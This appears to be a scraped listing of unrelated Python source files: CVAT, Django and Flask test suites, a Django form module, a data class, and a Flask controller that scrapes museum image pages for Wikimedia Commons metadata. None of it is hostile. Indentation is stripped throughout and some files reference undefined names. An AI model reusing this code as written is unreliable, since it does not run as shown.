elif dump_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], images)
else:
task = self._create_task(tasks["main"], images)
# create annotations
if dump_format_name in [
"MOT 1.1", "MOTS PNG 1.0", \
"PASCAL VOC 1.1", "Segmentation mask 1.1", \
"TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
"WiderFace 1.0", "VGGFace2 1.0", \
]:
self._create_annotations(task, dump_format_name, "default")
else:
self._create_annotations(task, dump_format_name, "random")
task_id = task["id"]
data_from_task_before_upload = self._get_data_from_task(task_id, include_images)
# dump annotations
url = self._generate_url_dump_tasks_annotations(task_id)
with TestDir() as test_dir:
file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self._check_downloaded_file(file_zip_name)
# remove annotations
self._remove_annotations(url, self.admin)
# upload annotations
if dump_format_name in ["CVAT for images 1.1", "CVAT for video 1.1"]:
upload_format_name = "CVAT 1.1"
else:
upload_format_name = dump_format_name
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url, binary_file, self.admin)
# equals annotations
data_from_task_after_upload = self._get_data_from_task(task_id, include_images)
compare_datasets(self, data_from_task_before_upload, data_from_task_after_upload)
def test_api_v1_check_duplicated_polygon_points(self):
test_name = self._testMethodName
images = self._generate_task_images(10)
task = self._create_task(tasks["main"], images)
task_id = task["id"]
data = {
"format": "CVAT for video 1.1",
"action": "download",
}
annotation_name = "CVAT for video 1.1 polygon"
self._create_annotations(task, annotation_name, "default")
annotation_points = annotations[annotation_name]["tracks"][0]["shapes"][0]['points']
with TestDir() as test_dir:
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}.zip')
self._download_file(url, data, self.admin, file_zip_name)
self._check_downloaded_file(file_zip_name)
folder_name = osp.join(test_dir, f'{test_name}')
with zipfile.ZipFile(file_zip_name, 'r') as zip_ref:
zip_ref.extractall(folder_name)
tree = ET.parse(osp.join(folder_name, 'annotations.xml'))
root = tree.getroot()
for polygon in root.findall("./track[@id='0']/polygon"):
polygon_points = polygon.attrib["points"].replace(",", ";")
polygon_points = [float(p) for p in polygon_points.split(";")]
self.assertEqual(polygon_points, annotation_points)
def test_api_v1_check_widerface_with_all_attributes(self):
test_name = self._testMethodName
dump_format_name = "WiderFace 1.0"
upload_format_name = "WiderFace 1.0"
for include_images in (False, True):
with self.subTest():
# create task with annotations
images = self._generate_task_images(3)
task = self._create_task(tasks["widerface with all attributes"], images)
self._create_annotations(task, f'{dump_format_name}', "random")
task_id = task["id"]
data_from_task_before_upload = self._get_data_from_task(task_id, include_images)
# dump annotations
url = self._generate_url_dump_tasks_annotations(task_id)
data = {
"format": dump_format_name,
"action": "download",
}
with TestDir() as test_dir:
file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
self._download_file(url, data, self.admin, file_zip_name)
self._check_downloaded_file(file_zip_name)
# remove annotations
self._remove_annotations(url, self.admin)
# upload annotations
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url, binary_file, self.admin)
# equals annotations
data_from_task_after_upload = self._get_data_from_task(task_id, include_images)
compare_datasets(self, data_from_task_before_upload, data_from_task_after_upload)\
def test_api_v1_check_attribute_import_in_tracks(self):
test_name = self._testMethodName
dump_format_name = "CVAT for video 1.1"
upload_format_name = "CVAT 1.1"
for include_images in (False, True):
with self.subTest():
# create task with annotations
images = self._generate_task_images(13)
task = self._create_task(tasks["many jobs"], images)
self._create_annotations(task, f'{dump_format_name} attributes in tracks', "default")
task_id = task["id"]
data_from_task_before_upload = self._get_data_from_task(task_id, include_images)
# dump annotations
url = self._generate_url_dump_tasks_annotations(task_id)
data = {
"format": dump_format_name,
"action": "download",
}
with TestDir() as test_dir:
file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
self._download_file(url, data, self.admin, file_zip_name)
self._check_downloaded_file(file_zip_name)
# remove annotations
self._remove_annotations(url, self.admin)
# upload annotations
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url, binary_file, self.admin)
# equals annotations
data_from_task_after_upload = self._get_data_from_task(task_id, include_images)
compare_datasets(self, data_from_task_before_upload, data_from_task_after_upload)
|
#!/usr/bin/env python
import unittest, os
from datetime import datetime
#import app
import models
#from . import app,db
#from .models import FeatureRequest
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
class BasicTests(unittest.TestCase):
def setUp(self):
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(BASE_DIR, 'app.db')
self.app = app.test_client()
db.drop_all()
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
def test_home_page(self):
response = self.app.get('/',follow_redirects=True)
self.assertEqual(response.status_code,200)
def test_feature_create(self):
new_feature = FeatureModel(title='title',client='A',description='desc',priority=1,product_area='policy',target_date=datetime.strptime('2019-03-26', '%Y-%m-%d'))
print(new_feature)
db.session.add(new_feature)
db.session.commit()
features = FeatureModel.query.all()
assert new_feature in features
print("NUMBER OF ENTRİES:")
print (len(features))
def test_feature_delete(self):
new_feature = FeatureModel(title='title',client='A',description='desc',priority=1,product_area='policy',target_date=datetime.strptime('2019-03-26', '%Y-%m-%d'))
db.session.add(new_feature)
db.session.commit()
feature_to_delete = FeatureModel.query.get(new_feature.id)
db.session.delete(feature_to_delete)
db.session.commit()
features = FeatureModel.query.all()
assert new_feature not in features
print("NUMBER OF ENTRİES:")
print (len(features))
if __name__ == '__main__':
unittest.main()
|
from datetime import timedelta
from django.contrib.contenttypes.models import ContentType
from django.utils import timezone
from api.audit_trail.enums import AuditType
from api.audit_trail.models import Audit
from api.audit_trail.tests.factories import AuditFactory
from api.cases.models import Case
from api.teams.tests.factories import TeamFactory
from test_helpers.clients import DataTestClient
from api.users.enums import UserType
from api.users.models import GovUser
from api.users.tests.factories import GovUserFactory, ExporterUserFactory
from api.audit_trail.service import filter_object_activity
class CasesAuditTrailSearchTestCase(DataTestClient):
def setUp(self):
super().setUp()
self.case = self.create_standard_application_case(self.organisation)
self.team = TeamFactory()
self.gov_user = GovUserFactory(team=self.team)
self.exporter_user = ExporterUserFactory()
self.content_type = ContentType.objects.get_for_model(Case)
def test_filter_by_gov_user(self):
AuditFactory(actor=self.gov_user, target=self.case.get_case())
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, user_id=self.gov_user.pk
)
self.assertEqual(res.count(), 1)
self.assertEqual(res.first().actor_object_id, str(self.gov_user.pk))
def test_filter_by_exporter_user(self):
AuditFactory(actor=self.exporter_user, target=self.case.get_case())
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, user_id=self.exporter_user.pk
)
self.assertEqual(res.count(), 1)
self.assertEqual(res.first().actor_object_id, str(self.exporter_user.pk))
def test_filter_by_team(self):
AuditFactory(actor=self.gov_user, target=self.case.get_case())
res = filter_object_activity(object_id=self.case.id, object_content_type=self.content_type, team=self.team)
self.assertEqual(res.count(), 1)
self.assertEqual(res.first().actor_object_id, str(self.gov_user.pk))
# Create new gov user on another team and test again
fake_team = TeamFactory()
fake_user = GovUserFactory(team=fake_team)
AuditFactory(actor=fake_user, target=self.case.get_case())
self.assertNotEqual(fake_team.id, self.team.id)
self.assertNotEqual(fake_user.pk, self.gov_user.pk)
res = filter_object_activity(object_id=self.case.id, object_content_type=self.content_type, team=self.team)
self.assertEqual(res.count(), 1)
self.assertEqual(res.first().actor_object_id, str(self.gov_user.pk))
def test_filter_by_audit_type(self):
audit_type = AuditType.UPDATED_STATUS
fake_audit_type = AuditType.GOOD_REVIEWED
AuditFactory(actor=self.exporter_user, verb=audit_type, target=self.case.get_case())
AuditFactory(actor=self.gov_user, verb=fake_audit_type, target=self.case.get_case())
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, audit_type=audit_type
)
self.assertEqual(res.count(), 2)
self.assertEqual(res.first().actor_object_id, str(self.exporter_user.pk))
self.assertEqual(res.first().verb, audit_type)
def test_filter_by_user_type(self):
AuditFactory(actor=self.gov_user, target=self.case.get_case())
AuditFactory(actor=self.exporter_user, target=self.case.get_case())
# check gov filter
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, user_type=UserType.INTERNAL
)
self.assertEqual(res.count(), 1)
self.assertEqual(res.first().actor_object_id, str(self.gov_user.pk))
# check exporter filter
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, user_type=UserType.EXPORTER
)
self.assertEqual(res.count(), 1)
self.assertEqual(res.first().actor_object_id, str(self.exporter_user.pk))
def test_filter_by_dates(self):
start_date = timezone.now()
middle_date = start_date + timedelta(days=3)
end_date = start_date + timedelta(days=5)
AuditFactory(created_at=start_date, actor=self.gov_user, target=self.case.get_case())
AuditFactory(created_at=middle_date, actor=self.gov_user, target=self.case.get_case())
AuditFactory(created_at=end_date, actor=self.gov_user, target=self.case.get_case())
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, date_from=start_date.date()
)
self.assertEqual(res.count(), 4)
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, date_from=middle_date.date()
)
self.assertEqual(res.count(), 2)
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, date_from=end_date.date()
)
self.assertEqual(res.count(), 1)
res = filter_object_activity(
object_id=self.case.id,
object_content_type=self.content_type,
date_from=start_date.date(),
date_to=middle_date.date(),
)
self.assertEqual(res.count(), 3)
res = filter_object_activity(
object_id=self.case.id,
object_content_type=self.content_type,
date_from=middle_date.date(),
date_to=end_date.date(),
)
self.assertEqual(res.count(), 2)
res = filter_object_activity(
object_id=self.case.id,
object_content_type=self.content_type,
date_from=end_date.date(),
date_to=end_date.date(),
)
self.assertEqual(res.count(), 1)
after_end_date = end_date + timedelta(days=1)
before_start_date = start_date - timedelta(days=1)
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, date_from=after_end_date.date()
)
self.assertEqual(res.count(), 0)
res = filter_object_activity(
object_id=self.case.id, object_content_type=self.content_type, date_to=before_start_date.date()
)
self.assertEqual(res.count(), 0)
|
#!/usr/bin/env python
# coding=utf-8
import tensorflow as tf
import numpy as np
tf.compat.v1.disable_eager_execution()
a = tf.random.normal(shape=[10], dtype=tf.float32)
with tf.device("/MY_DEVICE:0"):
b = tf.nn.relu(a)
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(allow_soft_placement=False, log_device_placement=True))
print(sess.run(b))
|
# Builder Pattern is a unique design pattern which helps in building complex object using simple objects and uses an algorithmic approach.
# In this design pattern, a builder class builds the final object in step-by-step procedure.
# Constructing Complex objects : The Builder Method allows you to construct the products step-by-step.
# Even, we can defer the execution of some steps without breaking th efinal product.
# To create an object tree, it is handy to call the steps recursively.
# It prevents the client code from fetching the incomplete data because it doesn’t allow the exposing of an unfinished object.
# Differ by Representations: The Builder pattern is applicable when construction of various representations of the product involves similar steps that differ only in the details.
# The base builder intterface is used to define all the construction steps while these steps are implemented by concrete builders. |
import pytest
from metadata_guardian.data_rules import AvailableCategory, DataRules
from metadata_guardian.scanner import ColumnScanner, ContentFilesScanner
from metadata_guardian.source import AvroSchemaSource
@pytest.mark.parametrize("local_file", ["example_rules.yaml"], indirect=["local_file"])
def test_get_data_rules_from_path_should_work(local_file):
data_rules = DataRules.from_path(path=local_file)
assert data_rules._data_rules is not None
@pytest.mark.parametrize(
"local_file", ["users_avro_schema.json"], indirect=["local_file"]
)
def test_get_data_rules_from_category_pii_with_violation(local_file):
data_rules = DataRules.from_available_category(category=AvailableCategory.PII)
source = AvroSchemaSource(local_path=local_file)
md_results = ColumnScanner(data_rules=data_rules).scan_local(source=source)
assert len(md_results.report_results[0].results) == 1
assert (
"tests/resources/users_avro_schema.json" in md_results.report_results[0].source
)
result = md_results.report_results[0].results[0]
assert result.content == "name"
assert result.category == "PII"
assert len(result.data_rules) == 1
data_rule = result.data_rules[0]
assert data_rule.rule_name == "person"
assert (
data_rule.documentation
== "The person is a personal identifiable information.\n"
)
@pytest.mark.parametrize(
"local_file", ["users_avro_schema.json"], indirect=["local_file"]
)
def test_get_data_rules_from_category_inclusion_no_violation(local_file):
data_rules = DataRules.from_available_category(category=AvailableCategory.INCLUSION)
source = AvroSchemaSource(local_path=local_file)
md_results = ColumnScanner(data_rules=data_rules).scan_local(source=source)
assert "resources/users_avro_schema.json" in md_results.report_results[0].source
assert len(md_results.report_results[0].results) == 0
@pytest.mark.parametrize(
"local_file", ["inclusion_violation.txt"], indirect=["local_file"]
)
def test_get_data_rules_from_category_inclusion_violation_content(local_file):
data_rules = DataRules.from_available_category(category=AvailableCategory.INCLUSION)
md_results = ContentFilesScanner(data_rules=data_rules).scan_local_file(local_file)
assert len(md_results.report_results[0].results) == 1
assert "resources/inclusion_violation.txt" in md_results.report_results[0].source
result = md_results.report_results[0].results[0]
assert (
result.content
== "feudal age in that they were not bound to the soil but to the master."
)
assert result.category == "INCLUSION"
assert len(result.data_rules) == 1
data_rule = result.data_rules[0]
assert data_rule.rule_name == "master"
assert (
data_rule.documentation
== '"Master–slave" is an offensive and exclusionary metaphor that cannot be detached from American\n'
"history. Prefer describing a hierarchical relationship between nodes more precisely. Prefer using\n"
"leader/follower, primary/replica or primary/standby.\n"
)
|
"""
tl;dr: See FutureModelForm's docstring.
Many apps provide new related managers to extend your django models with. For
example, django-tagulous provides a TagField which abstracts an M2M relation
with the Tag model, django-gm2m provides a GM2MField which abstracts an
relation, django-taggit provides a TaggableManager which abstracts a relation
too, django-generic-m2m provides RelatedObjectsDescriptor which abstracts a
relation again.
While that works pretty well, it gets a bit complicated when it comes to
encapsulating the business logic for saving such data in a form object. This is
three-part problem:
- getting initial data,
- saving instance attributes,
- saving relations like reverse relations or many to many.
Django's ModelForm calls the model field's ``value_from_object()`` method to get
the initial data. ``FutureModelForm`` tries the ``value_from_object()`` method
from the form field instead, if defined. Unlike the model field, the form field
doesn't know its name, so ``FutureModelForm`` passes it when calling the form
field's ``value_from_object()`` method.
Django's ModelForm calls the form field's ``save_form_data()`` in two
occasions:
- in ``_post_clean()`` for model fields in ``Meta.fields``,
- in ``_save_m2m()`` for model fields in ``Meta.virtual_fields`` and
``Meta.many_to_many``, which then operate on an instance which as a PK.
If we just added ``save_form_data()`` to form fields like for
``value_from_object()`` then it would be called twice, once in
``_post_clean()`` and once in ``_save_m2m()``. Instead, ``FutureModelForm``
would call the following methods from the form field, if defined:
- ``save_object_data()`` in ``_post_clean()``, to set object attributes for a
given value,
- ``save_relation_data()`` in ``_save_m2m()``, to save relations for a given
value.
For example:
- a generic foreign key only sets instance attributes, its form field would do
that in ``save_object_data()``,
- a tag field saves relations, its form field would do that in
``save_relation_data()``.
"""
from itertools import chain
from django import forms
class FutureModelForm(forms.ModelForm):
"""
ModelForm which adds extra API to form fields.
Form fields may define new methods for FutureModelForm:
- ``FormField.value_from_object(instance, name)`` should return the initial
value to use in the form, overrides ``ModelField.value_from_object()``
which is what ModelForm uses by default,
- ``FormField.save_object_data(instance, name, value)`` should set instance
attributes. Called by ``save()`` **before** writting the database, when
``instance.pk`` may not be set, it overrides
``ModelField.save_form_data()`` which is normally used in this occasion
for non-m2m and non-virtual model fields.
- ``FormField.save_relation_data(instance, name, value)`` should save
relations required for value on the instance. Called by ``save()``
**after** writting the database, when ``instance.pk`` is necessarely set,
it overrides ``ModelField.save_form_data()`` which is normally used in
this occasion for m2m and virtual model fields.
For complete rationale, see this module's docstring.
"""
def __init__(self, *args, **kwargs):
"""Override that uses a form field's ``value_from_object()``."""
super(FutureModelForm, self).__init__(*args, **kwargs)
for name, field in self.fields.items():
if not hasattr(field, 'value_from_object'):
continue
self.initial[name] = field.value_from_object(self.instance, name)
def _post_clean(self):
"""Override that uses the form field's ``save_object_data()``."""
super(FutureModelForm, self)._post_clean()
for name, field in self.fields.items():
if not hasattr(field, 'save_object_data'):
continue
field.save_object_data(
self.instance,
name,
self.cleaned_data.get(name, None),
)
def _save_m2m(self): # noqa
"""Override that uses the form field's ``save_object_data()``."""
cleaned_data = self.cleaned_data
exclude = self._meta.exclude
fields = self._meta.fields
opts = self.instance._meta
# Added to give the field a chance to do the work
handled = []
for name, field in self.fields.items():
if not hasattr(field, 'save_relation_data'):
continue
field.save_relation_data(
self.instance,
name,
cleaned_data[name]
)
handled.append(name)
# Note that for historical reasons we want to include also
# virtual_fields here. (GenericRelation was previously a fake
# m2m field).
for f in chain(opts.many_to_many, opts.virtual_fields):
# Added to give the form field a chance to do the work
if f.name in handled:
continue
if not hasattr(f, 'save_form_data'):
continue
if fields and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
if f.name in cleaned_data:
f.save_form_data(self.instance, cleaned_data[f.name])
def save(self, commit=True):
"""Backport from Django 1.9+ for 1.8."""
if self.errors:
raise ValueError(
"The %s could not be %s because the data didn't validate." % (
self.instance._meta.object_name,
'created' if self.instance._state.adding else 'changed',
)
)
if commit:
# If committing, save the instance and the m2m data immediately.
self.instance.save()
self._save_m2m()
else:
# If not committing, add a method to the form to allow deferred
# saving of m2m data.
self.save_m2m = self._save_m2m
return self.instance
|
"""
各种资源数据,包括聊天附带的表情、图片
、音频资源由于多个用户的资源可能有同一个,
所以不以userid为关联字段
create by judy 2018/10/18
"""
from commonbaby.helpers import helper_crypto, helper_str
from datacontract.idowndataset import Task
from datacontract.outputdata import EStandardDataType
from .feedbackbase import EResourceType, FeedDataBase, Resource
class RESOURCES(FeedDataBase, Resource):
"""
tsk: datacontract.Task\n
url: 资源的url链接,用作当前资源的唯一标识,不是用来访问的。
resourcetype: 0图片 1视频 2音频 3网站(分享链接) 4其他
"""
def __init__(self, clientid: str, tsk: Task, url: str,
resourcetype: EResourceType, apptype: int):
FeedDataBase.__init__(self, '.idown_resource',
EStandardDataType.Resource, tsk, apptype,
clientid, False)
Resource.__init__(self, url, resourcetype)
self.resourceid: str = None
self.extension: str = None
def _get_output_fields(self) -> dict:
"""返回当前输出的数据段的字段字典"""
self.append_to_fields('url', self._url)
self.append_to_fields('resourceid', self.resourceid)
self.append_to_fields('filename', self.filename)
self.append_to_fields('sign', self._sign_map[self.sign])
self.append_to_fields('extension', self.extension)
self.append_to_fields('resourcetype', self._resourcetype.value)
return self._fields
# def _get_write_lines(self):
# lines = ''
# lines += 'url:{}\r\n'.format(helper_str.base64format(self._url))
# if self.resourceid is not None and self.resourceid != '':
# lines += 'resourceid:{}\r\n'.format(
# helper_str.base64format(self.resourceid))
# if self.filename is not None and self.filename != '':
# lines += 'filename:{}\r\n'.format(
# helper_str.base64format(self.filename))
# if self.sign is not None and self.sign != ESign.Null:
# lines += 'sign:{}\r\n'.format(
# helper_str.base64format(self._sign_map[self.sign]))
# if self.extension is not None and self.extension != '':
# lines += 'extension:{}\r\n'.format(
# helper_str.base64format(self.extension))
# lines += 'resourcetype:{}\r\n'.format(self._resourcetype)
# lines += '\r\n'
# return lines
def get_uniqueid(self):
return helper_crypto.get_md5_from_str("{}{}{}".format(self.resourceid, self._task.apptype, self._url))
def get_display_name(self):
res = ''
if not helper_str.is_none_or_empty(self.filename):
res += " {}".format(self.filename)
if not helper_str.is_none_or_empty(self.sign):
res += " {}".format(self.sign)
return res
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import logging.handlers
import re
import sys
import os
from werkzeug.wrappers import Response
import urllib.request, urllib.error, urllib.parse
import requests
from bs4 import BeautifulSoup
import json
import cgi
from cgi import escape
import mwclient
import sqlite3
import io, gzip
import yaml
from flask import request, url_for, make_response
from .controller import Controller
import logging
logger = logging.getLogger()
class UrlController(Controller):
def __init__(self, app, config):
Controller.__init__(self, app)
self.config = config
def check_url(self, url, hostname):
logger = logging.getLogger()
# yield url
response = requests.get(url, headers={
'User-Agent': 'Oslobilder@Commons (+https://toolserver.org/~danmichaelo/oslobilder)',
'Referer': 'https://toolserver.org/~danmichaelo/oslobilder',
'Accept-Encoding': 'gzip'
})
soup = BeautifulSoup(response.text, 'html.parser')
commons = mwclient.Site('commons.wikimedia.org')
# Find license info:
cp = soup.find_all('p', 'copyright-info')
if len(cp) == 0:
cp = soup.find_all('p', 'copyright')
if len(cp) == 0:
logger.warn('No license info (URL: %s)', url)
return {'error': 'Fant ikke lisensinformasjon for bildet'}
else:
try:
tag = cp[0].find('a').get('href')
except AttributeError:
logger.warn('No license info (URL: %s)', url)
return {'error': 'Fant ikke lisensinformasjon for bildet'}
license = 'unknown'
if tag.find('licenses/by-sa/') != -1:
license = 'by-sa'
elif tag.find('licenses/by-nc-nd/') != -1:
license = 'by-nc-nd'
elif tag.find('/publicdomain/') != -1:
license = 'pd'
else:
logger.warn('Fant en ukjent lisens: "%s" (URL: %s)', tag, url)
# Find other metadata:
year = ''
fields = {}
cats = []
date_re = [
[re.compile(r'([0-9]{4}) - ([0-9]{4}) \(ca(\.)?\)', re.I), r'{{Other date|~|\1|\2}}'],
[re.compile(r'([0-9]{4}) \(ca(\.)?\)', re.I), r'{{Other date|~|\1}}'],
[re.compile(r'([0-9]{4}) - ([0-9]{4})'), r'{{Other date|-|\1|\2}}'],
[re.compile(r'([0-9]{4}) \(([0-9]{2})\.([0-9]{2})\.\)'), r'\1-\3-\2'],
[re.compile(r'^([0-9]{4}) \(ANT\)$'), r'\1 (assumed)'],
[re.compile(r'^([0-9]{4})$'), r'\1']
]
r3 = re.compile(r'^([^,]), (.*)$')
r4 = re.compile(r'ukjent( person)?', re.I)
fieldnames_re = [re.compile(q) for q in self.config['fieldnames']]
for tag in soup.find_all('dt'):
name = tag.text
matched = None
for f in fieldnames_re:
if f.search(name):
matched = f.pattern
break
if not matched:
logger.warn('Found unknown field: "%s" (URL: %s)', name, url)
for fn, fn_re in zip(self.config['fieldnames'], fieldnames_re):
tag = soup.find('dt', text=fn_re)
if not tag:
fields[fn] = 'NOTFOUND'
#yield "Fant ikke feltet %s" % fn
#return
else:
val = tag.findNext('dd')
if val == None:
fields[fn] = 'NOTFOUND'
continue
if val.find('div') != None:
val = val.find('div')
val = val.text.strip().rstrip('.')
if fn == 'Datering':
matched = False
for pattern, replacement in date_re:
match = pattern.match(val)
if match:
matched = True
val = pattern.sub(replacement, val)
year = match.groups()[-1]
if not matched:
logger.warn('Found unknown date format: "%s" (URL: %s)', val, url)
elif fn == 'Avbildet sted' or fn == 'Emneord':
val = '|'.join([q.text.strip() for q in tag.find_next('dd').find_all('a')])
elif fn == 'Avbildet person':
val = r3.sub(r'\2 \1', val)
cats.append(val)
while tag.find_next('dt').text.strip() == '':
tag = tag.find_next('dt')
tmp = tag.findNext('dd').findChild('div').text.strip()
tmp = r3.sub(r'\2 \1', tmp)
val += '\n' + tmp
cats.append(val)
elif fn == 'Fotograf' or fn == 'Kunstner':
vals = val.split(',')
if len(vals) == 2:
last = vals[0].strip()
first = vals[1].strip()
val = first + ' ' + last
if r4.search(val):
val = r4.sub(r'{{Unknown|author}}', val)
else:
creator_template = 'Creator:%s' % val
p = commons.pages[creator_template]
if p.exists:
if p.redirect:
creator_template = p.redirects_to().name
val = '{{%s}}' % creator_template
fields[fn] = val
# Find image source URL
src = soup.find('li', id='downloadpicture')
if src != None:
src = 'http://' + hostname + '.no' + src.find('a').get('href')
else:
src = soup.find('div','image').findChild('img').get('src')
src = src.split('?')[0] # remove dimensions query string
# Find institution and image identification
# DEBUG:
# return { 'error': 'schwoing', 'metadata': fields }
if fields['Permalenke'] != 'NOTFOUND':
institution, imageid = fields['Permalenke'].split('/',4)[3:]
elif fields['Eier'] != 'NOTFOUND' and fields['Inventarnr.'] != 'NOTFOUND':
institution = fields['Eier']
imageid = fields['Inventarnr.']
else:
return { 'error': 'unknown_institution', 'metadata': fields }
# Check if image has already been transferred
db = self.open_db()
db.row_factory = sqlite3.Row
cur = db.cursor()
rows = cur.execute('SELECT filename FROM files ' + \
'WHERE institution=? AND imageid=?', (institution, imageid)).fetchall()
if len(rows) > 0:
return { 'error': 'duplicate', 'institution': institution, 'imageid': imageid, 'filename': rows[0][0] }
else:
return { 'license': license, 'src': src, 'metadata': fields, 'cats': cats, 'year': year, 'hostname': hostname }
cur.close()
db.close()
#yield "hello"
#yield '<table>'
#for k, v in sorted(environ.items()):
#yield '<tr><th>%s</th><td>%s</td></tr>' % (escape(k), escape(v))
#yield '</table>'
def get(self):
url = request.args.get('url')
import sys
sys.stderr = sys.stdout
hostname = re.match(r'http(s)?://(www\.)?([a-z]*?)\.no', url)
if hostname == None:
print("Content-Type: text/plain")
print()
print("Invalid url!")
sys.exit(0)
hostname = hostname.group(3)
if hostname != 'oslobilder' and hostname != 'digitaltmuseum':
print("Content-Type: text/plain")
print()
print("Invalid url!")
sys.exit(0)
data = json.dumps(self.check_url(url, hostname))
resp = make_response(data)
resp.headers['Content-Type'] = 'application/json'
return resp
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.